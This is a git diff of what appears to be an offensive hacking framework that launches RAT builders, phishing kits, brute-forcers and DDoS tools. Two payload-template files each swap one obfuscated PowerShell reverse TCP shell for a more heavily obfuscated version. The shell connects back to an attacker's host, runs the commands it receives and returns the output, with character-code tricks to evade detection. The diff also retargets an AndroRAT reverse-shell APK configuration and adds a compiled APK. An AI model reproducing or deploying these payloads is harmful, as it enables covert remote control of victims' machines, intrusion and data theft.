diff --git a/src/core/langa.py b/src/core/langa.py index e2db689c..5cdc0e00 100644 --- a/src/core/langa.py +++ b/src/core/langa.py @@ -293,7 +293,6 @@ def user_agree(self): if covenant[0].lower() == "y": with open("src/agreement/covenant.txt", "w") as filewrite: filewrite.write("user accepted") - os.chdir("reports") neo.one() break else: diff --git a/src/externals/androrat/Compiled_apk/smali/com/example/reverseshell2/config.smali b/src/externals/androrat/Compiled_apk/smali/com/example/reverseshell2/config.smali index a637e679..955cb292 100644 --- a/src/externals/androrat/Compiled_apk/smali/com/example/reverseshell2/config.smali +++ b/src/externals/androrat/Compiled_apk/smali/com/example/reverseshell2/config.smali @@ -16,12 +16,12 @@ .locals 1 .line 4 - const-string v0, "192.168.1.4" + const-string v0, "192.168.117.128" sput-object v0, Lcom/example/reverseshell2/config;->IP:Ljava/lang/String; .line 5 - const-string v0, "9001" + const-string v0, "9000" sput-object v0, Lcom/example/reverseshell2/config;->port:Ljava/lang/String; diff --git a/src/externals/androrat/shepherd.apk b/src/externals/androrat/shepherd.apk new file mode 100644 index 00000000..40897145 Binary files /dev/null and b/src/externals/androrat/shepherd.apk differ diff --git a/src/externals/blackjack/blackjack.py b/src/externals/blackjack/BlackJack.py similarity index 100% rename from src/externals/blackjack/blackjack.py rename to src/externals/blackjack/BlackJack.py diff --git a/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp.py b/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp.py index 4226f1c0..c265fea9 100644 --- a/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp.py +++ b/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp.py @@ -25,28 +25,23 @@ class Payload: 'encode' : True } - data = """do { - & ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |ForEach-Object{$_}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$($_)}| % {$_}) -Seconds 15 - try{ - $TCPClient = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$_}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) Net.Sockets.TCPClient('*LHOST*', *LPORT*) - } catch {} -} until ($TCPClient.Connected) -$NetworkStream = $TCPClient.GetStream() -$StreamWriter = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $($_))})) |ForEach-Object{$_}|%{$_}| % {$($_)}) IO.StreamWriter($NetworkStream) -function WriteToStream ($String) { - [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize |ForEach-Object{$($_)}|%{$($_)}| % {0} - $StreamWriter.Write($String + 'PS ' + (& ([string]::join('', ( (71,101,116,45,76,111,99,97,116,105,111,110) |ForEach-Object{$($_)}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$_})).Path + '> ') - $StreamWriter.Flush() -} -WriteToStream '' -while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { - $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1) - $Output = try { - & ([string]::join('', ( (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) $Command 2>&1 |ForEach-Object{$($_)}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '') - } catch { - $_ |ForEach-Object{$_}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '') - } - WriteToStream ($Output) -} -$StreamWriter.Close()""" + data = """ + do { + $g9mUZ1Vrvz = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$_}| % {$($_)}) $([char](25+83-25)+[char](115+121-115)+[char](48*115/48)+[char](14+116-14)+[char](67+101-67)+[char](14+109-14)+[char](77+46-77)+[char](15*78/15)+[char](47+101-47)+[char](0+116-0)+[char](89+46-89)+[char](68+83-68)+[char](0+111-0)+[char](15*99/15)+[char](55+107-55)+[char](80*101/80)+[char](52*116/52)+[char](98*115/98)+[char](29*46/29)+[char](72+84-72)+[char](0+67-0)+[char](90+80-90)+[char](0+67-0)+[char](23+108-23)+[char](117*105/117)+[char](32*101/32)+[char](11*110/11)+[char](35+116-35))('*LHOST*', *LPORT*) + $hPAMk4Q9lENeLgUT2XRtj8xJz = $g9mUZ1Vrvz.GetStream() + [byte[]] $DnFwvUAMP9p0qgLafT5idck = 0..65535 |%{$($_)}| & ([string]::join('', ( (70,111,114,69,97,99,104,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_}) { 0 } + + while (($Nx1 = $hPAMk4Q9lENeLgUT2XRtj8xJz.Read($DnFwvUAMP9p0qgLafT5idck, 0, $DnFwvUAMP9p0qgLafT5idck.Length)) -ne 0) { + $7HsSUGdpYkriwFLqQhAl = (& ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$_}|%{ ( [char][int] $_)})) |%{$($_)}| % {$($_)}) -TypeName ([string]::join('', ( (83,121,115,116,101,109,46,84,101,120,116,46,65,83,67,73,73,69,110,99,111,100,105,110,103) |%{$_}|%{ ( [char][int] $_)})) |%{$_}| % {$_})).GetString($DnFwvUAMP9p0qgLafT5idck, 0, $Nx1) + $k7iqSJnb6 = (& (("-LaPUA2bEm3pk9tf01gvSqlrIG6BwNdjc4VZsYCuXR8Jey57oKMWxniTzFQhHOD")[24,53,19,48,12,44,0,8,52,11,23,44,36,36,54,48,53] -join '') ". { $7HsSUGdpYkriwFLqQhAl } 2>&1" |%{$($_)}| & ([string]::join('', ( (79,117,116,45,83,116,114,105,110,103) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_})) + $TS5bJYV10mLNBKzpEc = $k7iqSJnb6 + 'PS ' + (& (("IF6MLa5HJU30E7kGuvNSwpThj8Yl9ZDcxqz2obArmi-Pyd4WfVCKtnQOsR1gBeX")[15,61,52,42,4,36,31,5,52,41,36,53] -join '')).Path + '> ' + $5fRrSIJ = ([text.encoding]::ASCII).GetBytes($TS5bJYV10mLNBKzpEc) + $hPAMk4Q9lENeLgUT2XRtj8xJz.Write($5fRrSIJ, 0, $5fRrSIJ.Length) + $hPAMk4Q9lENeLgUT2XRtj8xJz.Flush() + } + + $g9mUZ1Vrvz.Close() + & ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |%{$($_)}|%{ ( [char][int] $($_))})) |%{$_}| % {$_}) -Seconds 15 +} while ($true) +""" diff --git a/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp_v2.py b/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp_v2.py index 4226f1c0..c265fea9 100644 --- a/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp_v2.py +++ b/src/externals/blackjack/Core/payload_templates/windows/netcat/powershell_reverse_tcp_v2.py @@ -25,28 +25,23 @@ class Payload: 'encode' : True } - data = """do { - & ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |ForEach-Object{$_}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$($_)}| % {$_}) -Seconds 15 - try{ - $TCPClient = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$_}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) Net.Sockets.TCPClient('*LHOST*', *LPORT*) - } catch {} -} until ($TCPClient.Connected) -$NetworkStream = $TCPClient.GetStream() -$StreamWriter = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $($_))})) |ForEach-Object{$_}|%{$_}| % {$($_)}) IO.StreamWriter($NetworkStream) -function WriteToStream ($String) { - [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize |ForEach-Object{$($_)}|%{$($_)}| % {0} - $StreamWriter.Write($String + 'PS ' + (& ([string]::join('', ( (71,101,116,45,76,111,99,97,116,105,111,110) |ForEach-Object{$($_)}|%{$($_)}|%{ ( [char][int] $($_))})) |ForEach-Object{$($_)}|%{$_}| % {$_})).Path + '> ') - $StreamWriter.Flush() -} -WriteToStream '' -while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { - $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1) - $Output = try { - & ([string]::join('', ( (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110) |ForEach-Object{$($_)}|%{$_}|%{ ( [char][int] $_)})) |ForEach-Object{$($_)}|%{$_}| % {$($_)}) $Command 2>&1 |ForEach-Object{$($_)}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '') - } catch { - $_ |ForEach-Object{$_}|%{$($_)}| & (("xOFCNl5UbI4P1ZM6daqYfrG2hc-zS0AwBvLEmyHuoe38XjgRiQJ9kW7VntpTKDs")[1,39,57,26,28,57,21,48,56,46] -join '') - } - WriteToStream ($Output) -} -$StreamWriter.Close()""" + data = """ + do { + $g9mUZ1Vrvz = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$_}| % {$($_)}) $([char](25+83-25)+[char](115+121-115)+[char](48*115/48)+[char](14+116-14)+[char](67+101-67)+[char](14+109-14)+[char](77+46-77)+[char](15*78/15)+[char](47+101-47)+[char](0+116-0)+[char](89+46-89)+[char](68+83-68)+[char](0+111-0)+[char](15*99/15)+[char](55+107-55)+[char](80*101/80)+[char](52*116/52)+[char](98*115/98)+[char](29*46/29)+[char](72+84-72)+[char](0+67-0)+[char](90+80-90)+[char](0+67-0)+[char](23+108-23)+[char](117*105/117)+[char](32*101/32)+[char](11*110/11)+[char](35+116-35))('*LHOST*', *LPORT*) + $hPAMk4Q9lENeLgUT2XRtj8xJz = $g9mUZ1Vrvz.GetStream() + [byte[]] $DnFwvUAMP9p0qgLafT5idck = 0..65535 |%{$($_)}| & ([string]::join('', ( (70,111,114,69,97,99,104,45,79,98,106,101,99,116) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_}) { 0 } + + while (($Nx1 = $hPAMk4Q9lENeLgUT2XRtj8xJz.Read($DnFwvUAMP9p0qgLafT5idck, 0, $DnFwvUAMP9p0qgLafT5idck.Length)) -ne 0) { + $7HsSUGdpYkriwFLqQhAl = (& ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{$_}|%{ ( [char][int] $_)})) |%{$($_)}| % {$($_)}) -TypeName ([string]::join('', ( (83,121,115,116,101,109,46,84,101,120,116,46,65,83,67,73,73,69,110,99,111,100,105,110,103) |%{$_}|%{ ( [char][int] $_)})) |%{$_}| % {$_})).GetString($DnFwvUAMP9p0qgLafT5idck, 0, $Nx1) + $k7iqSJnb6 = (& (("-LaPUA2bEm3pk9tf01gvSqlrIG6BwNdjc4VZsYCuXR8Jey57oKMWxniTzFQhHOD")[24,53,19,48,12,44,0,8,52,11,23,44,36,36,54,48,53] -join '') ". { $7HsSUGdpYkriwFLqQhAl } 2>&1" |%{$($_)}| & ([string]::join('', ( (79,117,116,45,83,116,114,105,110,103) |%{$($_)}|%{ ( [char][int] $_)})) |%{$($_)}| % {$_})) + $TS5bJYV10mLNBKzpEc = $k7iqSJnb6 + 'PS ' + (& (("IF6MLa5HJU30E7kGuvNSwpThj8Yl9ZDcxqz2obArmi-Pyd4WfVCKtnQOsR1gBeX")[15,61,52,42,4,36,31,5,52,41,36,53] -join '')).Path + '> ' + $5fRrSIJ = ([text.encoding]::ASCII).GetBytes($TS5bJYV10mLNBKzpEc) + $hPAMk4Q9lENeLgUT2XRtj8xJz.Write($5fRrSIJ, 0, $5fRrSIJ.Length) + $hPAMk4Q9lENeLgUT2XRtj8xJz.Flush() + } + + $g9mUZ1Vrvz.Close() + & ([string]::join('', ( (83,116,97,114,116,45,83,108,101,101,112) |%{$($_)}|%{ ( [char][int] $($_))})) |%{$_}| % {$_}) -Seconds 15 +} while ($true) +""" diff --git a/src/externals/ufonet/core/json/stats.json b/src/externals/ufonet/core/json/stats.json index 8d475171..cd2fa6fa 100644 --- a/src/externals/ufonet/core/json/stats.json +++ b/src/externals/ufonet/core/json/stats.json @@ -1 +1 @@ -{"flying": "36", "missions": "3", "scanner": "0", "transferred": "12764", "max_chargo": 12772, "completed": "0", "loic": "2", "loris": "2", "ufosyn": "0", "spray": "0", "smurf": "0", "fraggle": "0", "xmas": "0", "ufoack": "0", "uforst": "0", "droper": "0", "overlap": "0", "pinger": "0", "ufoudp": "0", "nuke": "0", "tachyon": "0", "monlist": "0", "sniper": "0", "crashed": "0"} \ No newline at end of file +{"flying": "37", "missions": "3", "scanner": "0", "transferred": "12764", "max_chargo": 12772, "completed": "0", "loic": "2", "loris": "2", "ufosyn": "0", "spray": "0", "smurf": "0", "fraggle": "0", "xmas": "0", "ufoack": "0", "uforst": "0", "droper": "0", "overlap": "0", "pinger": "0", "ufoudp": "0", "nuke": "0", "tachyon": "0", "monlist": "0", "sniper": "0", "crashed": "0"} \ No newline at end of file diff --git a/src/guide/info.py b/src/guide/info.py index e3b08c14..0c75e9c5 100644 --- a/src/guide/info.py +++ b/src/guide/info.py @@ -7,7 +7,7 @@ def __init__(self): pass def guide(self): - with open('./src/guide/guide.txt', 'r') as guide: + with open('src/guide/guide.txt', 'r') as guide: for line in guide: sys.stdout.write(line) sys.stdout.flush() diff --git a/src/internal/scanner.py b/src/internal/scanner.py index ead76fac..2e7bbea1 100644 --- a/src/internal/scanner.py +++ b/src/internal/scanner.py @@ -202,7 +202,7 @@ def packets_responder(self): def kickthemout_dos(self): os.system('clear') - process = os.system('cd ./src/externals/kickthemout; python3 ./kickthemout.py') + process = os.system('cd src/externals/kickthemout; python3 kickthemout.py') return process internal_scanner = Interna_Attack(host = '') diff --git a/src/kitchen/malware.py b/src/kitchen/malware.py index 604a3043..21d8565d 100644 --- a/src/kitchen/malware.py +++ b/src/kitchen/malware.py @@ -1,5 +1,6 @@ import sys import time +import socket import subprocess from src.core.banner import * from src.core.bcolors import * @@ -7,15 +8,26 @@ class generator(object): def __init__(self): pass + def get_local_ip(self): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + # doesn't have to be reachable + s.connect(('10.255.255.255', 1)) + IP = s.getsockname()[0] + except Exception: + IP = '127.0.0.1' + finally: + s.close() + return IP def shellz(self): os.system('clear') - process = subprocess.Popen('cd ./src/externals/shells/; bash shells.py', shell = True).wait() + process = subprocess.Popen('cd src/externals/shells/; bash shells.py', shell = True).wait() return process def blackjack(self): a = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lport" + bcolors.GREEN + ")# " + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/blackjack/; python3 BlackJack.py -s -n {0}'.format(a), shell = True).wait() + process = subprocess.Popen('cd src/externals/blackjack/; python3 BlackJack.py -s -n {0}'.format(a), shell = True).wait() return process def powerjoker(self): @@ -24,12 +36,12 @@ def powerjoker(self): ip = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lhost" + bcolors.GREEN + ")# " + bcolors.ENDC) port = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "port" + bcolors.GREEN + ")# " + bcolors.ENDC) os.system('clear') - process = subprocess.Popen('cd ./src/externals/joker/; python3 joker.py -l {0} -p {1}'.format(ip, port), shell = True).wait() + process = subprocess.Popen('cd src/externals/joker/; python3 joker.py -l {0} -p {1}'.format(ip, port), shell = True).wait() return process def meterpeter(self): os.system('clear') - process = subprocess.Popen('cd ./src/externals/meterpeter/; pwsh meterpeter.ps1', shell = True).wait() + process = subprocess.Popen('cd src/externals/meterpeter/; pwsh meterpeter.ps1', shell = True).wait() return process def havoc(self): @@ -40,19 +52,19 @@ def havoc(self): def teardroid(self): malware = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "output name" + bcolors.GREEN + ")# " + bcolors.ENDC) os.system('clear') - process = subprocess.Popen('cd ./src/externals/Teardroid-phprat/; python3 Teardroid.py -b {0}'.format(malware), shell = True).wait() + process = subprocess.Popen('cd src/externals/Teardroid-phprat/; python3 Teardroid.py -b {0}'.format(malware), shell = True).wait() return process def androrat(self): print("\n") subprocess.Popen('ip addr', shell = True).wait() - ip = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lhost" + bcolors.GREEN + ")# " + bcolors.ENDC) + ip = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lhost" + bcolors.YELLOW + "(%s)" %(rat.get_local_ip()) + bcolors.GREEN + ")# " + bcolors.ENDC) port = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "lport" + bcolors.GREEN + ")# " + bcolors.ENDC) - malware = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "output name" + bcolors.GREEN + ")# " + bcolors.ENDC) + malware = input(bcolors.GREEN + "(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework" + bcolors.ENDC + ":" + bcolors.GREEN + "(" + bcolors.RED + "give_name.of.output" + bcolors.GREEN + ")# " + bcolors.ENDC) os.system('clear') - process = subprocess.Popen('cd ./src/externals/androrat/; python3 androRAT.py --build -i %s -p %s -o %s' %(ip, port, malware), shell = True).wait() - process = subprocess.Popen('cd ./src/externals/androrat/; python3 androRAT.py --shell -i %s -p %s' %(ip, port), shell = True).wait() + process = subprocess.Popen('cd src/externals/androrat/; python3 androRAT.py --build -i %s -p %s -o %s%s' %(ip, port, malware, ".apk"), shell = True).wait() + process = subprocess.Popen('cd src/externals/androrat/; python3 androRAT.py --shell -i %s -p %s' %(ip, port), shell = True).wait() return process rat = generator() diff --git a/src/passcrack/cracker.py b/src/passcrack/cracker.py index cc491af9..17720137 100644 --- a/src/passcrack/cracker.py +++ b/src/passcrack/cracker.py @@ -106,7 +106,7 @@ def cyberbrute_all(host): host = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework:" + bcolors.RED + "target" + bcolors.GREEN + ")# " + bcolors.ENDC) os.system('clear') print(bcolors.BLUE + "~>[ " + bcolors.RED + "Bruteforcing all services" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/cyberbrute; bash ./cyberbrute.sh %s' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/cyberbrute; bash cyberbrute.sh %s' %(host), shell = True).wait() print("\n") return process @@ -115,7 +115,7 @@ def hash_buster(self): hashes = input(bcolors.GREEN + "\n(" + bcolors.ENDC + "africana:" + bcolors.DARKCYAN + "framework:" + bcolors.RED + "hashes" + bcolors.GREEN + ")# " + bcolors.ENDC) os.system('clear') print(bcolors.BLUE + "~>[ " + bcolors.RED + "Bruteforcing Hashes" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(hashes) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/hash-buster; python3 ./cracker.py -t 10 %s' %(hashes), shell = True).wait() + process = subprocess.Popen('cd src/externals/hash-buster; python3 cracker.py -t 10 %s' %(hashes), shell = True).wait() print("\n") return process diff --git a/src/phishing/phisher.py b/src/phishing/phisher.py index 7460234a..3a791027 100644 --- a/src/phishing/phisher.py +++ b/src/phishing/phisher.py @@ -18,20 +18,20 @@ def phish_goodginx(self): return process def phish_setoolkit(self): - process = os.system('cd ./src/externals/set/; python3 setoolkit') + process = os.system('cd src/externals/set/; python3 setoolkit') return process def phish_anonphisher(self): - process = subprocess.Popen("cd ./src/externals/anonphisher; bash anonphisher.sh", shell = True).wait() + process = subprocess.Popen("cd src/externals/anonphisher; bash anonphisher.sh", shell = True).wait() return process def phish_zphisher(self): - process = subprocess.Popen("cd ./src/externals/AdvPhishing; bash AdvPhishing.sh", shell = True).wait() + process = subprocess.Popen("cd src/externals/AdvPhishing; bash AdvPhishing.sh", shell = True).wait() time.sleep(0.03) return process def phish_cyberphish(self): - process = subprocess.Popen("cd ./src/externals/cyberphish; python3 cyberphish.py", shell = True).wait() + process = subprocess.Popen("cd src/externals/cyberphish; python3 cyberphish.py", shell = True).wait() time.sleep(0.03) return process diff --git a/src/scriptures/salvation.py b/src/scriptures/salvation.py index d82710b9..d8c815f7 100644 --- a/src/scriptures/salvation.py +++ b/src/scriptures/salvation.py @@ -9,7 +9,7 @@ def __init__(self): def gospel(self): while True: try: - with open('./src/scriptures/kjv.txt', 'r') as verses: + with open('src/scriptures/kjv.txt', 'r') as verses: words = color() + verses.read() for w in words: sys.stdout.write(w) diff --git a/src/security/anonym.py b/src/security/anonym.py index 2d112d39..1f42ea5b 100644 --- a/src/security/anonym.py +++ b/src/security/anonym.py @@ -31,15 +31,15 @@ def vanish_install(self): def vanish_start(self): os.system('clear') - subprocess.Popen(['cd ./src/externals/tor-vanish/; python3 vanisher.py -m'], shell = True).wait() + subprocess.Popen(['cd src/externals/tor-vanish/; python3 vanisher.py -m'], shell = True).wait() def vanish_stop(self): os.system('clear') - subprocess.Popen('cd ./src/externals/tor-vanish/; python3 vanisher.py -e', shell = True).wait() + subprocess.Popen('cd src/externals/tor-vanish/; python3 vanisher.py -e', shell = True).wait() def checktor_status(self): os.system('clear') - subprocess.Popen('cd ./src/externals/tor-vanish/; python3 vanisher.py -w', shell = True).wait() + subprocess.Popen('cd src/externals/tor-vanish/; python3 vanisher.py -w', shell = True).wait() def chains_start(self): os.system('clear') diff --git a/src/webattack/scanner.py b/src/webattack/scanner.py index 3279e52c..fce1120f 100644 --- a/src/webattack/scanner.py +++ b/src/webattack/scanner.py @@ -50,7 +50,7 @@ def ssl_scan(self, host): def gobuster(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Mining root files on" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('gobuster dir vhost --debug --no-error --random-agent -w ./src/wordlists/content/big.txt -e -u %s' %(host), shell = True).wait() + process = subprocess.Popen('gobuster dir vhost --debug --no-error --random-agent -w src/wordlists/content/big.txt -e -u %s' %(host), shell = True).wait() print("\n") return process @@ -101,93 +101,93 @@ def xss_man_xsser(self, host): def owasp_1(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Started port scan & wappalyzer" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s -m port_scan -t 100' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s -m port_scan -t 100' %(host), shell = True).wait() print("\n") return process def owasp_2(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Started subdomains reconing" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s -m subdomain_scan' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s -m subdomain_scan' %(host), shell = True).wait() print("\n") return process def owasp_3(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched admin_scan" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s -m scan', shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s -m scan', shell = True).wait() print("\n") return process def owasp_4(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Start information gathering" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s -m information_gathering -s', shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s -m information_gathering -s', shell = True).wait() print("\n") return process def owasp_5(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Start vulnscansecurity checks" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s -m server_version_vuln' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s -m server_version_vuln' %(host), shell = True).wait() print("\n") return process def owasp_6(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Runing CVE scans on the target" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s -m cve' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s -m cve' %(host), shell = True).wait() print("\n") return process def owasp_7(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Searching for (critical vulns & exploit) " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s -m high_severity' %(host), shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s -m high_severity' %(host), shell = True).wait() print("\n") return process def owasp_8(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched automated & intrusive checks" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py -i %s --profile all/results.txt', shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py -i %s --profile all/results.txt', shell = True).wait() print("\n") return process def owasp_9(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Launched WebUI (key: africana)" + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/nettacker/; python3 nettacker.py --start-api --api-access-key africana', shell = True).wait() + process = subprocess.Popen('cd src/externals/nettacker/; python3 nettacker.py --start-api --api-access-key africana', shell = True).wait() print("\n") return process def jok3r_1(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Installing all jok3r tools (Pleas start be patient) " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; /bin/bash ./install-all.sh', shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; /bin/bash install-all.sh', shell = True).wait() print("\n") return process def jok3r_2(self, host): print(bcolors.BLUE + "~>[ " + bcolors.RED + "Updating all the tools in the toolbox (Pleas start be patient) " + bcolors.BLUE + " ]" + bcolors.BLUE + " -> " + bcolors.BLUE + "[ " + bcolors.YELLOW + "%s" %(host) + bcolors.BLUE + " ]<~\n" + bcolors.ENDC) - process = subprocess.Popen('cd ./src/externals/jok3r/; python3 jok3r.py toolbox --update-all --auto', shell = True).wait() + process = subprocess.Popen('cd src/externals/jok3r/; 